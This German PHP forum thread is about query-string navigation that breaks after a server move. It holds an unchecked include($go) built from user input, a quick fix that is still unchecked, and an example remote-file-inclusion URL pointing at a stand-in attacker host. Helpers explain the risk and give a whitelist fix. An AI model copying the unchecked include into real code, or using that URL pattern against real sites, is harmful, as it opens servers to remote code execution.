Weiterleitung in PHP

[Sven_F]

Hallo!

Jetzt wird mit sicherheit so mancher die Hände übern Kopf zusammenschlagen aber was solls!

Ich habe folgenes Prob:

Meine Seite ist mit Tabellen gebaut

HTML-Code:

 ------------------------------------
|                 1                  |
 ------------------------------------
|     2     |            3           |
 ------------------------------------
|                4                   |
 ------------------------------------

1= Header
2= Navi
3= Content
4= Footer

Nun habe ich die 3 Spalten natürlich in
HEADER
BODY
FOOTER
getrennt

Body ist dann wiederum aufgeteilt in
NAVI
CONTENT

Wobei ich in Body folgenen Befehl nutze :

PHP-Code:

if ($go == "")
{$go = "main.php";}
include("$go"); 


in der NAVI gehe ich dann wie folgt vor um eine Weiterleitung in den CONTENT zu bekommen:

PHP-Code:

<a href="index.php?go=TESTSEITE.php" target="_self" OnMouseOver="window.defaultStatus=' ';return true"  OnClick="window.defaultStatus=' ';"  OnMouseOut="window.defaultStatus=' ';return true">
TESTSEITE
</a> 


Der Befehl funktioniert wunderbar jedoch habe ich nun einen Serverwechsel vorgenommen und alles 1:1 auf dem Neuen Server hochgeladen!

Nun funktioniert diese art von Navigation nicht mehr!

Egal auf welchen Link ich klicke es kommt immer nur die MAIN.PHP
In der Adresszeile wird aber das richtige angezeigt und eine Fehlermeldung erfolgt auch keine !
Es wird einfach nur nicht die TESTSEITE im CONTENT wiedergegeben!

Der Neue Server hat aber PHP-Medule installiert!

Nun weiß ich absolut nicht woran es liegen könnte das die Navigation nicht auf dem neuen Server funktioniert!
Auch die Betreiber konnten mir nicht weiterhelfen!

Hab Ihr schonmal so ein Problem gehabt oder ne ahnung woran es liegen könnte?
Muß der Server-Betreiber eine gewisse Version von PHP installiert haben damit diese Art von Navigation auch auf dem neuen Server funktioniert?

Wäre echt super wenn mir da jemand nen Rat oder Tip geben könnte!

[fettmme]

1. Auf Deinem Testserver ist register_globals off.
2. Dein Code ist ein riesiges Sicherheitsloch.

[DSB]

So geht es wieder:

Code:

$go=(isset($_GET['go'])) ? $_GET['go']:'main.php';
include($go);

aber fettmme hat vollkommen recht.
Du lädst ohne weitere Prüfung der $go-Variablen förmlich zum Hacken Deiner Seite ein. Warum das so ist und wie man sich besser schützen kann wurde hier schon oft genauer besprochen.

[Sven_F]

Oha eine Einladung für Hacker?

Nun dann werde ich mal schaun ob ich diesbezüglich hier im Forum was finde!

Ist es mit der abhilfe von DSB auch noch ein Risiko?

[fettmme]

So ist es besser:

PHP-Code:

$valideSeiten = array('main','kontakt');

if(is_array($valideSeiten) && in_array($_GET['go'], $valideSeiten) ){
       $go = $_GET['go'];
}else{
       $go = 'main';
}


include($go.'.php'); 


[Sven_F]

Also mit DSB seinem Codeschnippsel funktioniert nun die Navigation wieder! Soweit schonmal DANKE!

@fettmme
gehe ich recht in der annahme das ich bei

PHP-Code:

$valideSeiten = array('main','kontakt'); 


Weitere Links schreiben muß ?
Beispiel :

PHP-Code:

$valideSeiten = array('main','kontakt','impressum','forum'); 


Oder reicht es mit dem eigendlichen Link wie bisher?

PHP-Code:

<a href="index.php?go=GEWÜNSCHTE SEITE .php" target="_self" OnMouseOver="window.defaultStatus=' ';return true"  OnClick="window.defaultStatus=' ';"  OnMouseOut="window.defaultStatus=' ';return true"> 
TESTSEITE 
</a> 


[fettmme]

Zitat:

Zitat von Sven_F

@fettmme
gehe ich recht in der annahme das ich bei

PHP-Code:

$valideSeiten = array('main','kontakt'); 


Weitere Links schreiben muß ?
Beispiel :

PHP-Code:

$valideSeiten = array('main','kontakt','impressum','forum'); 


[/php]

Richtig

[Sven_F]

hmmm.......

Das habe ich gerade mal ausprobiert und muß leider sagen das es nicht funktioniert!

Wie sollte da der eigendliche Link aussehen?
(Vielleicht funktioniert auch dies nicht auf dem Server auf dem ich es austeste)

Ich habe auf einigen Seiten gesehen das die mit dem Gleichen Prinziep arbeiten jedoch wird in der Adresszeile nur die eigendliche Domaingeschrieben nicht der Ganze Pfad

Wie nennt man diese Art? (Dann kann ich mich mal auf die Suche im Forum und im Netz machen)

[Sven_F]

oh... mein Fehler Fettmme!

Habe übersehen das die Endung PHP schon hier vorhanden ist :

PHP-Code:

include($go.'.php'); 


daher reicht es den Link wie folgt zu schreiben :

PHP-Code:

<a href="index.php?go=IMPRESSUM" target="_self" OnMouseOver="window.defaultStatus=' ';return true"  OnClick="window.defaultStatus=' ';"  OnMouseOut="window.defaultStatus=' ';return true">  
IMPRESSUM 
</a> 


Ohne die Endung PHP

So funktioniert auch Fettmme`s Variante!

Nun muß ich nur noch schauen wie man die Einladung für Hacker umgehen kann!

[DSB]

In dem Array definierst Du all die gültigen Seiten.
Manipuliert ein Hacker nun die Variable und ruft die index.php z.B. mit "index.php?go=http://www.hackers_server.de/boeses_script" auf, so ist der Eintrag "http://www.hackers_server.de/boeses_script" nicht im Array der gültigen URLs enthalten und wird auf "main" zurückgesetzt.

Bei Deiner alten Lösung wäre das include so ausgeführt worden und der Hacker hätte eigene Scripte einschleusen können. Das "böse Script" hätte alle möglichen Informationen über den Server ausgeben können - Umgebungsvariablen, im Script definierte Variablen, ja sogar Aufrufe von Systembefehlen und ähnliches.

Jetzt kann er das nicht mehr, da Du bestimmst welche Aufrufe überhaupt als gültig akzeptiert werden.

[Sven_F]

Achso das ist schon die Sichere Lösung!

Super da wurden gleich 2 Probleme mit nur einer Frage gelöst! Klasse und Danke für eure Hilfe!

Nebenbei hätt ich da noch ne kleine Frage die aber nicht so wichtig wäre!

Wie funktioniert das bei einigen seiten das anstelle des gesamten Pfades nur die Hauptdomain in der Adresszeile zu sehen ist?

Beispiel (sind keine exestierende Links) :
Link = www.MeineDomain.de/index.php?go=Impressum
Adresszeile = www.MeineDomain.de

Ich hoffe ich habe verständlich genug gefragt!
Leider weiß ich nicht genau wie man mein Vorhaben nennt deswegen kann ich auch leider nicht im Großen WWW danach suchen da mir der Begriff für mein Vorhaben fehlt!

Auch wenn keiner eine Lösung dazu hat wäre mir schon ein Suchbegriff eine Sehr große hilfe!

[DSB]

Zitat:

Zitat von Sven_F

Wie funktioniert das bei einigen seiten das anstelle des gesamten Pfades nur die Hauptdomain in der Adresszeile zu sehen ist?

Das geht nur mit Hilfe eines Framesets.
(Oder wenn alle Links in Wirklichkeit das Übermitteln eines Postformulars auslösen)

Wenn Du sowas hier meinst:
http://www.server.de/bild/script/posting12
dann such mal nach url_rewriting und mod_url.
Das wird in Verbindung mit .htaccess genutzt - Dein Hoster muss dieses Modul aber in seiner Serverkonfiguration eingeschaltet haben.
Das funktioniert über den Befehl "RewriteCond".
Ist aber ein recht komplexes Thema für sich. :-)

[Sven_F]

DSB dein Link funktioniert nicht!

Aber macht nix!
Danke für die Fachbegriffe mit denen werde ich gewiss etwas im Netz finden!

Werde ich mir mal nen Tag nehmen und mich auf die Suche machen!

[DSB]

Zitat:

Zitat von Sven_F

DSB dein Link funktioniert nicht!

Das war ein Beispiel für den Aufbau eines solchen URLs.

[Sven_F]

Achso

Ich meinte mit meiner frage das in der Adresszeile oben nur die Domain steht!

Hier genau in diesem moment steht in der Adresszeile :

http://www.traum-projekt.com/forum/1...tml#post587602

Und mit meinem Vorhaben würde in der Adresszeile nur folgenes stehen :

http://www.traum-projekt.com

So meinte ich das!
Aber ich denke auch so hast du es verstanden gehabt oder?